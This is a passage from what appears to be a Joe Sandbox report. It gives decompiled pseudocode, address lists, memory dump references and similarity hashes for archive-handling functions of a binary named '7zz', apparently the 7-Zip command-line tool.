					 *((intOrPtr*)(_t128 + 0x3c)) = 0x47aa4c;
					return _t128;
				} else {
					 *(_t218 - 4) = 2;
					E00408604(_t218 - 0x74);
					 *((intOrPtr*)(_t218 - 0x20)) = 0x47a420;
					 *(_t218 - 4) = 4;
					E0040862D();
					 *(_t218 - 4) = 1;
					E00408604(_t218 - 0x20);
					_t208 = 0;
					if( *((intOrPtr*)(_t218 - 0x80)) > 0) {
						do {
							if(( *( *((intOrPtr*)( *((intOrPtr*)(_t218 - 0x7c)) + _t208 * 4)) + 0x2c) >> 0x00000004 & 0x00000001) == 0) {
								_push(E0041528B(_t218 - 0xc4, _t218 - 0x18, _t208));
								 *(_t218 - 4) = 5;
								E00406796(_t218 - 0x38);
								 *(_t218 - 4) = 1;
								E00407A18( *(_t218 - 0x18));
							}
							_t208 = _t208 + 1;
							_t228 = _t208 -  *((intOrPtr*)(_t218 - 0x80));
						} while (_t208 <  *((intOrPtr*)(_t218 - 0x80)));
					}
					 *(_t218 - 4) =  *(_t218 - 4) & 0x00000000;
					E004102DF(_t218 - 0xc4, _t228);
					if( *((intOrPtr*)(_t218 - 0x30)) == _t168) {
						 *(_t218 + 8) = "there is no such archive";
						E0046B8F4(_t218 + 8, 0x47cf70);
					}
					E00405B9F(_t218 - 0x60);
					 *((intOrPtr*)(_t218 - 0x60)) = 0x47a420;
					_t209 = 0;
					 *(_t218 - 4) = 6;
					if( *((intOrPtr*)(_t218 - 0x30)) > _t168) {
						do {
							 *(_t218 - 0x18) = _t168;
							 *(_t218 - 0x14) = _t168;
							 *(_t218 - 0x10) = _t168;
							E00401E9A(_t218 - 0x18, 3);
							 *(_t218 - 4) = 7;
							E0040A5AF();
							_push(_t218 - 0x18);
							E00406796(_t218 - 0x60);
							 *(_t218 - 4) = 6;
							E00407A18( *(_t218 - 0x18));
							_t209 = _t209 + 1;
						} while (_t209 <  *((intOrPtr*)(_t218 - 0x30)));
					}
					E00404AD0(_t218 - 0x4c, 4);
					 *((intOrPtr*)(_t218 - 0x4c)) = 0x47a668;
					 *(_t218 - 4) = 8;
					E004195A6(_t218 - 0x60, _t218 - 0x4c);
					E0040867E( *((intOrPtr*)(_t218 - 0x24)),  *((intOrPtr*)(_t218 - 0x44)));
					E0040867E( *(_t218 + 8),  *((intOrPtr*)(_t218 - 0x44)));
					if( *((intOrPtr*)(_t218 - 0x44)) > _t168) {
						do {
							_t212 =  *( *((intOrPtr*)(_t218 - 0x40)) + _t168 * 4) << 2;
							_push( *((intOrPtr*)(_t212 +  *((intOrPtr*)(_t218 - 0x2c)))));
							E00406796( *((intOrPtr*)(_t218 - 0x24)));
							_push( *((intOrPtr*)(_t212 +  *((intOrPtr*)(_t218 - 0x54)))));
							E00406796( *(_t218 + 8));
							_t168 = _t168 + 1;
						} while (_t168 <  *((intOrPtr*)(_t218 - 0x44)));
					}
					 *(_t218 - 4) = 6;
					E00408604(_t218 - 0x4c);
					 *((intOrPtr*)(_t218 - 0x60)) = 0x47a420;
					 *(_t218 - 4) = 9;
					E0040862D();
					 *(_t218 - 4) =  *(_t218 - 4) & 0x00000000;
					E00408604(_t218 - 0x60);
					 *((intOrPtr*)(_t218 - 0x38)) = 0x47a420;
					 *(_t218 - 4) = 0xa;
					E0040862D();
					 *(_t218 - 4) =  *(_t218 - 4) | 0xffffffff;
					_t142 = E00408604(_t218 - 0x38);
					 *[fs:0x0] =  *((intOrPtr*)(_t218 - 0xc));
					return _t142;
				}
			}

0x00410043
0x00410053
0x00410059
0x00410063
0x00410066
0x0041006e
0x00410071
0x00410079
0x0041007d
0x00410082
0x0041008a
0x0041008e
0x00410093
0x004100a3
0x004100a7
0x004100a8
0x004100a9
0x004100ab
0x004100af
0x004100b6
0x00410281
0x00410288
0x0041028d
0x0041028e
0x00410292
0x00410294
0x0041029a
0x0041029d
0x004102a0
0x004102a3
0x004102a6
0x004102ac
0x004102af
0x004102b2
0x004102b5
0x004102b8
0x004102bb
0x004102be
0x004102c1
0x004102c4
0x004102c7
0x004102ca
0x004102cd
0x004102d0
0x004102d3
0x004102d6
0x004102de
0x004100c5
0x004100c8
0x004100cc
0x004100d1
0x004100d7
0x004100db
0x004100e3
0x004100e7
0x004100ec
0x004100f1
0x004100f3
0x00410101
0x00410113
0x00410117
0x0041011b
0x00410120
0x00410127
0x0041012c
0x0041012d
0x0041012e
0x0041012e
0x004100f3
0x00410133
0x0041013d
0x00410145
0x00410150
0x00410157
0x00410157
0x0041015f
0x00410164
0x00410167
0x0041016c
0x00410170
0x00410172
0x00410177
0x0041017a
0x0041017d
0x00410180
0x0041018b
0x00410196
0x004101a1
0x004101a2
0x004101a7
0x004101ae
0x004101b3
0x004101b5
0x00410172
0x004101bf
0x004101c4
0x004101d1
0x004101d5
0x004101e0
0x004101eb
0x004101f3
0x004101f5
0x00410203
0x00410206
0x00410209
0x00410214
0x00410217
0x0041021c
0x0041021d
0x004101f5
0x00410225
0x00410229
0x0041022e
0x00410234
0x00410238
0x0041023d
0x00410244
0x00410249
0x0041024f
0x00410256
0x0041025b
0x00410262
0x0041026d
0x00410275
0x00410275

APIs

__EH_prolog.LIBCMT ref: 00410043

Part of subcall function 00415349: __EH_prolog.LIBCMT ref: 0041534E

Part of subcall function 00406796: __EH_prolog.LIBCMT ref: 0040679B

Strings

59@, xrefs: 0041005E, 0041028D, 004102A6

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: 59@
API String ID: 3519838083-2780377667
Opcode ID: 62da0f27e3cacdeb6fde7cd36ca36bc92bb1d3e930a35b93c99b7167f577b6c6
Instruction ID: a6bdb68d8052a433f7f109985f49a34908dcb5d84b45f2bdbde216e6b6000813
Opcode Fuzzy Hash: 62da0f27e3cacdeb6fde7cd36ca36bc92bb1d3e930a35b93c99b7167f577b6c6
Instruction Fuzzy Hash: AD914EB0C00258DFCB14EF9AC985ADDBBB5BF54308F1181AEE109B7292DB785A44CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041721B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0041721B(void* __ecx, void* __eflags) {
				void* __edi;
				void* _t66;
				signed int _t77;
				void* _t86;
				void* _t88;
				signed int _t115;
				void* _t120;

				E0046B890(E00474C34, _t120);
				_t86 = __ecx;
				E00405B9F(_t120 - 0x38);
				 *((intOrPtr*)(_t120 - 0x38)) = 0x47a420;
				_t115 = 0;
				 *(_t120 - 4) = 0;
				E00405B9F(_t120 - 0x4c);
				 *((intOrPtr*)(_t120 - 0x4c)) = 0x47a420;
				_t126 =  *((intOrPtr*)(_t120 + 8));
				 *(_t120 - 4) = 1;
				if( *((intOrPtr*)(_t120 + 8)) != 0) {
					E00403532(_t120 - 0x18,  *((intOrPtr*)(_t120 + 8))); // executed
					 *(_t120 - 4) = 2;
					E00417377(_t120 - 0x18, _t120 - 0x38, _t126);
					 *(_t120 - 4) = 1;
					E00407A18( *(_t120 - 0x18));
				}
				_t127 =  *((intOrPtr*)(_t120 + 0xc)) - _t115;
				if( *((intOrPtr*)(_t120 + 0xc)) != _t115) {
					E00403532(_t120 - 0x18,  *((intOrPtr*)(_t120 + 0xc)));
					 *(_t120 - 4) = 3;
					E00417377(_t120 - 0x18, _t120 - 0x4c, _t127);
					 *(_t120 - 4) = 1;
					E00407A18( *(_t120 - 0x18));
				}
				if( *((intOrPtr*)(_t120 - 0x30)) <= 0) {
					L10:
					 *((intOrPtr*)(_t120 - 0x4c)) = 0x47a420;
					 *(_t120 - 4) = 6;
					E0040862D();
					 *(_t120 - 4) =  *(_t120 - 4) & 0x00000000;
					E00408604(_t120 - 0x4c);
					 *((intOrPtr*)(_t120 - 0x38)) = 0x47a420;
					 *(_t120 - 4) = 7;
					E0040862D();
					 *(_t120 - 4) =  *(_t120 - 4) | 0xffffffff;
					_t66 = E00408604(_t120 - 0x38);
					 *[fs:0x0] =  *((intOrPtr*)(_t120 - 0xc));
					return _t66;
				} else {
					_t88 = _t86 + 0x18;
					do {
						E0040351A(_t120 - 0x24);
						 *(_t120 - 4) = 4;
						E0040351A(_t120 - 0x18);
						 *(_t120 - 4) = 5;
						E00401E26(_t120 - 0x24,  *((intOrPtr*)( *((intOrPtr*)(_t120 - 0x2c)) + _t115 * 4)));
						if(_t115 <  *((intOrPtr*)(_t120 - 0x44))) {
							E00401E26(_t120 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t120 - 0x40)) + _t115 * 4)));
							_t77 = E00408053( *(_t120 - 0x18), 0x48bb7c);
							if(_t77 == 0) {
								 *(_t120 - 0x14) =  *(_t120 - 0x14) & _t77;
								 *( *(_t120 - 0x18)) =  *( *(_t120 - 0x18)) & 0x00000000;
							}
						}
						_push(_t120 - 0x24);
						E00417791(_t88, _t115);
						 *(_t120 - 4) = 1;
						E00407A18( *(_t120 - 0x18));
						E00407A18( *((intOrPtr*)(_t120 - 0x24)));
						_t115 = _t115 + 1;
					} while (_t115 <  *((intOrPtr*)(_t120 - 0x30)));
					goto L10;
				}
			}

0x00417220
0x00417229
0x00417230
0x0041723a
0x0041723d
0x00417242
0x00417245
0x0041724a
0x0041724d
0x00417250
0x00417254
0x0041725c
0x00417267
0x0041726b
0x00417273
0x00417277
0x0041727c
0x0041727d
0x00417280
0x00417288
0x00417293
0x00417297
0x0041729f
0x004172a3
0x004172a8
0x004172ad
0x0041732d
0x0041732d
0x00417333
0x00417337
0x0041733c
0x00417343
0x00417348
0x0041734e
0x00417355
0x0041735a
0x00417361
0x0041736c
0x00417374
0x004172af
0x004172af
0x004172b2
0x004172b5
0x004172bd
0x004172c1
0x004172cc
0x004172d3
0x004172db
0x004172e6
0x004172f3
0x004172fa
0x004172fc
0x00417302
0x00417302
0x004172fa
0x0041730b
0x0041730c
0x00417314
0x00417318
0x00417320
0x00417325
0x0041732a
0x00000000
0x004172b2

APIs

__EH_prolog.LIBCMT ref: 00417220

Part of subcall function 00417377: __EH_prolog.LIBCMT ref: 0041737C

Strings

59@, xrefs: 00417235

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: 59@
API String ID: 3519838083-2780377667
Opcode ID: 5004501c2401821115a51ffef3e39df9269668dc0aafc01eff95271498320234
Instruction ID: 873c80215d370b6b671446c0e79e2b2cb706c6381e77b2058a47ab1539bbaff3
Opcode Fuzzy Hash: 5004501c2401821115a51ffef3e39df9269668dc0aafc01eff95271498320234
Instruction Fuzzy Hash: C6416D71C0414DEECF05EFA5D546AEDBFB0AF54318F10806EE80173292DB386A85DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C83C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0040C83C(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _t26;
				void* _t31;
				void* _t32;
				intOrPtr _t42;
				intOrPtr* _t45;
				signed int _t50;
				void* _t58;
				intOrPtr* _t59;
				void* _t60;

				E0046B890(E00473E52, _t60);
				_push(__ecx);
				_push(__ecx);
				_t26 =  *0x490be0; // 0x12
				 *((intOrPtr*)(_t60 - 0x14)) = __edx;
				_t50 = 0;
				 *((intOrPtr*)(_t60 - 0x10)) = __ecx;
				if(_t26 <= 0) {
					L17:
					if( *((intOrPtr*)(_t60 + 0x18)) != 0) {
						_t53 =  *((intOrPtr*)(_t60 - 0x10));
						if( *( *((intOrPtr*)(_t60 - 0x10))) != 0) {
							_push(0x78);
							_t42 = E004079F2();
							 *((intOrPtr*)(_t60 + 0x14)) = _t42;
							 *(_t60 - 4) = 0;
							if(_t42 == 0) {
								_t58 = 0;
							} else {
								_t31 = E0040D550(_t42); // executed
								_t58 = _t31;
							}
							 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
							E0040C9B4( *((intOrPtr*)(_t60 - 0x14)), _t58);
							_t22 = _t58 + 0x74; // 0x74
							E0040C9B4(_t22,  *_t53);
						}
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
					return 0;
				} else {
					_t45 = 0x490ae0;
					do {
						_t59 =  *_t45;
						if( *((intOrPtr*)(_t59 + 8)) ==  *((intOrPtr*)(_t60 + 8)) &&  *((intOrPtr*)(_t59 + 0xc)) ==  *((intOrPtr*)(_t60 + 0xc))) {
							if( *((intOrPtr*)(_t60 + 0x14)) == 0) {
								if( *_t59 != 0) {
									_t32 =  *_t59();
									L11:
									if( *((intOrPtr*)(_t59 + 0x18)) == 0) {
										_push(_t32);
										if( *((intOrPtr*)(_t59 + 0x14)) != 1) {
											E0040C9B4( *((intOrPtr*)(_t60 + 0x10)));
										} else {
											E0040C9B4( *((intOrPtr*)(_t60 - 0x14)));
										}
									} else {
										E0040C9B4( *((intOrPtr*)(_t60 - 0x10)), _t32);
									}
									goto L17;
								}
								goto L8;
							}
							if( *((intOrPtr*)(_t59 + 4)) != 0) {
								_t32 =  *((intOrPtr*)(_t59 + 4))();
								goto L11;
							} else {
								goto L8;
							}
						}
						L8:
						_t50 = _t50 + 1;
						_t45 = _t45 + 4;
					} while (_t50 < _t26);
					goto L17;
				}
			}

0x0040c841
0x0040c846
0x0040c847
0x0040c848
0x0040c84e
0x0040c853
0x0040c859
0x0040c85c
0x0040c8bf
0x0040c8c2
0x0040c8c4
0x0040c8c9
0x0040c8cb
0x0040c8d3
0x0040c8d5
0x0040c8da
0x0040c8dd
0x0040c8e8
0x0040c8df
0x0040c8df
0x0040c8e4
0x0040c8e4
0x0040c8ed
0x0040c8f2
0x0040c8f9
0x0040c8fc
0x0040c8fc
0x0040c8c9
0x0040c909
0x0040c911
0x0040c85e
0x0040c85e
0x0040c863
0x0040c863
0x0040c86b
0x0040c878
0x0040c883
0x0040c8b3
0x0040c892
0x0040c895
0x0040c8a6
0x0040c8a7
0x0040c8ba
0x0040c8a9
0x0040c8ac
0x0040c8ac
0x0040c897
0x0040c89b
0x0040c89b
0x00000000
0x0040c895
0x00000000
0x0040c883
0x0040c87d
0x0040c88f
0x00000000
0x0040c87f
0x00000000
0x0040c87f
0x0040c87d
0x0040c885
0x0040c885
0x0040c886
0x0040c889
0x00000000
0x0040c88d

APIs

__EH_prolog.LIBCMT ref: 0040C841

Strings

I, xrefs: 0040C85E

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: I
API String ID: 3519838083-299795746
Opcode ID: 459aedaa02336b51509d93332a302b4edd80c34f2b1668e4d39c44968d6b4148
Instruction ID: 7b3e389aea170d28871fe4c7e7a7ec955f419ab3ca2688fab4717e103c8f7ea0
Opcode Fuzzy Hash: 459aedaa02336b51509d93332a302b4edd80c34f2b1668e4d39c44968d6b4148
Instruction Fuzzy Hash: F8218C72904245DBDB24FFA589C046EB7A2AB40305B24863FE152B76C1CB38AD45D79E

Uniqueness

Uniqueness Score: -1.00%

Function 00415349 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00415349(intOrPtr __ecx, intOrPtr __edx) {
				void* _t40;
				signed int _t41;
				signed int _t42;
				void* _t43;
				intOrPtr _t50;
				intOrPtr _t64;
				void* _t65;
				void* _t69;

				_t50 = __ecx;
				E0046B890(E00474820, _t69);
				 *((intOrPtr*)(_t69 - 0x14)) = __edx;
				 *((intOrPtr*)(_t69 - 0x18)) = __ecx;
				 *(_t69 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 8)) <= 0) {
					L8:
					E004152E1( *((intOrPtr*)(_t69 - 0x14)));
					_t40 = 0;
				} else {
					while(1) {
						_t41 =  *(_t50 + 0xc);
						_t64 =  *((intOrPtr*)(_t41 +  *(_t69 - 0x10) * 4));
						if( *((intOrPtr*)(_t64 + 4)) != 0) {
							_push(_t64);
							_push(0xffffffff);
							_t42 = E00415303( *((intOrPtr*)(_t69 - 0x14)), _t69, __eflags, 0xffffffff);
						} else {
							_t42 = _t41 | 0xffffffff;
						}
						 *((intOrPtr*)(_t69 - 0x28)) = 0;
						 *((intOrPtr*)(_t69 - 0x24)) = 0;
						 *((intOrPtr*)(_t69 - 0x20)) = 0;
						 *((intOrPtr*)(_t69 - 0x1c)) = 4;
						 *((intOrPtr*)(_t69 - 0x2c)) = 0x47a420;
						 *(_t69 - 4) = 0;
						_t23 = _t64 + 0xc; // 0xc, executed
						_t43 = E00415420(_t23, _t42, 0xffffffff, _t64, _t69 - 0x2c,  *((intOrPtr*)(_t69 - 0x14)), 0,  *((intOrPtr*)(_t69 + 8)),  *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 0x10))); // executed
						_t65 = _t43;
						 *((intOrPtr*)(_t69 - 0x2c)) = 0x47a420;
						 *(_t69 - 4) = 1;
						E0040862D();
						 *(_t69 - 4) =  *(_t69 - 4) | 0xffffffff;
						E00408604(_t69 - 0x2c);
						if(_t65 != 0) {
							break;
						}
						 *(_t69 - 0x10) =  *(_t69 - 0x10) + 1;
						if( *(_t69 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t69 - 0x18)) + 8))) {
							_t50 =  *((intOrPtr*)(_t69 - 0x18));
							continue;
						} else {
							goto L8;
						}
						goto L9;
					}
					_t40 = _t65;
				}
				L9:
				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
				return _t40;
			}

0x00415349
0x0041534e
0x0041535e
0x00415361
0x00415364
0x00415367
0x00415401
0x00415404
0x00415409
0x0041536d
0x00415377
0x00415377
0x0041537d
0x00415383
0x0041538d
0x0041538e
0x00415392
0x00415385
0x00415385
0x00415385
0x00415397
0x0041539a
0x0041539d
0x004153a0
0x004153a7
0x004153b2
0x004153c3
0x004153c6
0x004153cb
0x004153cd
0x004153d3
0x004153da
0x004153df
0x004153e6
0x004153ed
0x00000000
0x00000000
0x004153ef
0x004153fb
0x00415374
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004153fb
0x0041541c
0x0041541c
0x0041540b
0x00415411
0x00415419

APIs

__EH_prolog.LIBCMT ref: 0041534E

Strings

59@, xrefs: 0041535C, 0041536D

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: 59@
API String ID: 3519838083-2780377667
Opcode ID: 151458e0659461347c1d03a06ddd24b008cc591c285c689024c003f5389a7c67
Instruction ID: 7eef16f8fbdbee1da98b56e57a5457bfcb84ef35117a6ae98f398b0350cb022f
Opcode Fuzzy Hash: 151458e0659461347c1d03a06ddd24b008cc591c285c689024c003f5389a7c67
Instruction Fuzzy Hash: E62128B1D00519DFCB04DF99C8819EEFB71FB88368F20822EE52567290D7755981CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040B431 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B431(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				signed int _t24;
				void* _t53;

				E0046B890(E00473D9C, _t53);
				_t47 =  *(_t53 + 8);
				if(E0040B669( *(_t53 + 8)) == 0) {
					_t15 = _t53 + 8;
					 *_t15 =  *(_t53 + 8) | 0xffffffff;
					__eflags =  *_t15;
					 *(_t53 - 4) = 1;
					_t24 = E0040B174(_t53 + 8, _t47,  *_t15, _t47, __ecx); // executed
					_t34 = _t24;
					E0040B154(_t53 + 8);
				} else {
					E0040B414(__ecx);
					 *(_t53 - 0x1c) =  *(_t53 - 0x1c) | 0xffffffff;
					 *((char*)(__ecx + 0x24)) = 1;
					_t34 = 0;
					 *(_t53 - 4) = 0;
					if(E0040BC4A(_t47) != 0) {
						E00403593(__ecx + 0x28, _t47 + 8);
						if( *((intOrPtr*)(_t53 - 0x17)) != 0) {
							 *__ecx =  *((intOrPtr*)(_t53 - 0x14));
							 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t53 - 0x10));
						}
						_t34 = 1;
					}
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					E0040B87D(_t53 - 0x1c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t34;
			}

0x0040b436
0x0040b441
0x0040b44f
0x0040b49e
0x0040b49e
0x0040b49e
0x0040b4a7
0x0040b4ae
0x0040b4b6
0x0040b4b8
0x0040b451
0x0040b453
0x0040b458
0x0040b45c
0x0040b460
0x0040b466
0x0040b470
0x0040b479
0x0040b481
0x0040b486
0x0040b48b
0x0040b48b
0x0040b48e
0x0040b48e
0x0040b490
0x0040b497
0x0040b497
0x0040b4c5
0x0040b4cd

APIs

__EH_prolog.LIBCMT ref: 0040B436

Strings

59@, xrefs: 0040B440

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: 59@
API String ID: 3519838083-2780377667
Opcode ID: cb7b4bd2c4af9b8fe15fa2cdcbd2e201475b04ce8f4a32cc0f81032e162c00ed
Instruction ID: 8a2df7c348f84777b7ad1a159669c3b3579df71dbce98e58b468e3cdb01b9464
Opcode Fuzzy Hash: cb7b4bd2c4af9b8fe15fa2cdcbd2e201475b04ce8f4a32cc0f81032e162c00ed
Instruction Fuzzy Hash: 2B11C4719002049ACB24EF59C4519EEBBB4EF55368F10823EE866A73C2C7389B05CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00406D26 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00406D26(signed int* __ecx) {
				signed int _t17;
				signed int* _t18;
				signed int* _t22;
				signed int _t31;
				signed int* _t34;
				void* _t36;

				E0046B890(E00473641, _t36);
				_push(__ecx);
				_t34 = __ecx;
				 *__ecx =  *(_t36 + 8);
				_t22 = 0;
				_t17 = 4;
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				__ecx[3] = 0;
				__ecx[4] = 0;
				__ecx[5] = 0;
				__ecx[6] = _t17;
				__ecx[2] = 0x47a420;
				_t31 =  *__ecx;
				 *((intOrPtr*)(_t36 - 4)) = 0;
				_push(_t31 * 0x1c + _t17); // executed
				_t18 = E004079F2(); // executed
				 *(_t36 + 8) = _t18;
				 *((char*)(_t36 - 4)) = 1;
				if(_t18 != 0) {
					_push(E00406E0B);
					_t11 =  &(_t18[1]); // 0x4
					_t22 = _t11;
					 *_t18 = _t31;
					E0046BDE5(_t22, 0x1c, _t31, E00406DA2);
				}
				 *(_t34 + 4) = _t22;
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x00406d2b
0x00406d30
0x00406d36
0x00406d3b
0x00406d3d
0x00406d3f
0x00406d40
0x00406d43
0x00406d46
0x00406d49
0x00406d4c
0x00406d4f
0x00406d56
0x00406d58
0x00406d62
0x00406d63
0x00406d69
0x00406d6e
0x00406d72
0x00406d74
0x00406d7e
0x00406d7e
0x00406d85
0x00406d87
0x00406d87
0x00406d8f
0x00406d97
0x00406d9f

APIs

__EH_prolog.LIBCMT ref: 00406D2B

Strings

59@, xrefs: 00406D38, 00406D4F, 00406D62, 00406D81

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: 59@
API String ID: 3519838083-2780377667
Opcode ID: ccaf45141dc2e5dfeafb79c2efc15b9fdd1926c8c86a780438c4f9b1b500aaa8
Instruction ID: 8e0203aed7f2cdd9f9826150055b001f54c225d166ae57bfc4d77955059de4c0
Opcode Fuzzy Hash: ccaf45141dc2e5dfeafb79c2efc15b9fdd1926c8c86a780438c4f9b1b500aaa8
Instruction Fuzzy Hash: E30152B1A00304AFD724DF5ED885A9AFBF4FB48704B50893FE14AD7781D3749A448B94

Uniqueness

Uniqueness Score: -1.00%

Function 00418A23 Relevance: 3.2, APIs: 2, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00418A23(intOrPtr __ecx) {
				intOrPtr _t105;
				intOrPtr _t113;
				void* _t115;
				intOrPtr _t118;
				long _t123;
